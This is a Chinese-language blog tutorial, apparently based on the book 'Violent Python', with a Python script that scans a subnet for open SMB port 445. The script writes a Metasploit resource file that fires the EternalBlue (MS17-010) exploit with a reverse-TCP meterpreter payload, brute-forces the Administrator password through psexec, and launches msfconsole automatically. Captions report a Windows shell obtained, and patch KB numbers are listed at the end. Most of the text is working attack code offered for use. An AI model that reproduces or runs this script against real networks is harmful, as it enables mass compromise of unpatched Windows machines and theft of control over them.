python结合metasploit渗透攻击
本文教你如何使用python调用metasploit攻击永恒之蓝漏洞
一、渗透攻击-攻击脚本
1 #! /usr/bin/env python 2 #-*- coding:utf-8 -*- 3 ''' 4 Created on 2019年11月15日 5 6 @author: perilong 7 ''' 8 9 import nmap 10 import os 11 import optparse 12 13 14 # 扫描网段所有开放445端口的IP地址 15 def findTgts(subNet): 16 nmScan = nmap.PortScanner() 17 nmScan.scan(subNet, '445') 18 tgtHosts = [] 19 for host in nmScan.all_hosts(): 20 if nmScan[host].has_tcp(445): 21 state = nmScan[host]['tcp'][445]['state'] 22 if state == 'open': 23 print '[+] Found Target Host: '+host 24 tgtHosts.append(host) 25 return tgtHosts 26 27 # 设置handler攻击 28 def setupHandler(configFile, lhost, lport): 29 configFile.write('use exploit/multi/handler\n') 30 configFile.write('set payload generic/shell_reverse_tcp\n') 31 configFile.write('set LPORT '+str(lport)+'\n') 32 configFile.write('set LHOST '+lhost+'\n') 33 configFile.write('exploit -j -z\n') 34 configFile.write('setg DisablePayloadHandler 1\n') 35 36 37 def confickerExploit(configFile, tgtHost, lhost, lport): 38 configFile.write('use exploit/windows/smb/ms17_010_eternalblue \n') 39 configFile.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp \n') 40 configFile.write('set RHOSTS '+tgtHost+'\n') 41 configFile.write('set LHOST '+lhost+' \n') 42 configFile.write('set LPORT '+str(lport)+' \n') 43 configFile.write('exploit -j -z\n') 44 45 # 已知用户密码攻击或暴力破解攻击 46 def smbBrute(configFile, tgtHost, passwdFile, lhost, lport): 47 username = 'Administrator' 48 pF = open(passwdFile, 'r') 49 for password in pF.readlines(): 50 password = password.strip('\n').strip('\r') 51 configFile.write('use exploit/windows/smb/psexec\n') 52 configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n') 53 configFile.write('set SMBUser '+str(username)+'\n') 54 configFile.write('set SMBPass '+str(password)+'\n') 55 configFile.write('set RHOSTS '+tgtHost+'\n') 56 configFile.write('set LHOST '+lhost+' \n') 57 configFile.write('set LPORT '+str(lport)+' \n') 58 configFile.write('exploit -j -z\n') 59 60 # 漏洞攻击 61 def setupHandler1(configFile, rhosts, lhost, lport): 62 configFile.write('use exploit/windows/smb/ms17_010_eternalblue \n') 63 configFile.write('set RHOSTS '+rhosts+'\n') 64 configFile.write('set PAYLOAD windows/x64/meterpreter/reverse_tcp \n') 65 configFile.write('set LHOST '+lhost+' \n') 66 configFile.write('set LPORT '+str(lport)+' \n') 67 configFile.write('exploit \n') 68 69 # 使用命令行参数输入 70 def main(): 71 configFile = open('meta.rc', 'w') 72 parser = optparse.OptionParser('[-] Usage%prog -H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]') 73 parser.add_option('-H',dest='tgtHost',type='string',help='specify the target address[es]') 74 parser.add_option('-p',dest='lport',type='string',help='specify the listen port') 75 parser.add_option('-l',dest='lhost',type='string',help='specify the listen address') 76 parser.add_option('-F',dest='passwdFile',type='string',help='Password file for SMB brute force attempt') 77 (options, args) = parser.parse_args() 78 if (options.tgtHost==None) | (options.lhost==None): 79 print parser.usage 80 exit(0) 81 lhost = options.lhost 82 lport = options.lport 83 if lport == None: 84 lport == '1337' 85 passwdFile = options.passwdFile 86 tgtHosts = findTgts(options.tgtHost) 87 setupHandler(configFile, lhost, lport) 88 for tgtHost in tgtHosts: 89 confickerExploit(configFile, tgtHost, lhost, lport) 90 if passwdFile != None: 91 smbBrute(configFile, tgtHost, passwdFile, lhost, lport) 92 configFile.close() 93 os.system('msfconsole -r meta.rc') 94 95 if __name__ == '__main__': 96 # main() 97 98 targets = findTgts('10.68.16.1-254') 99 for target in targets: 100 configFile = open('/home/perilong.rc', 'w') 101 setupHandler1(configFile, '10.68.16.104', '10.68.16.110', 5556) 102 configFile.close() 103 os.system('msfconsole -r /home/perilong.rc)
1、端口扫描结束后自动写入攻击脚本并进入攻击
2、攻击进行中
3、攻击成功
进入windows shell
本文靶机信息:
漏洞补丁:
win7:KB4012212
win8-server: KB4012215
参考: python绝技
浙公网安备 33010602011771号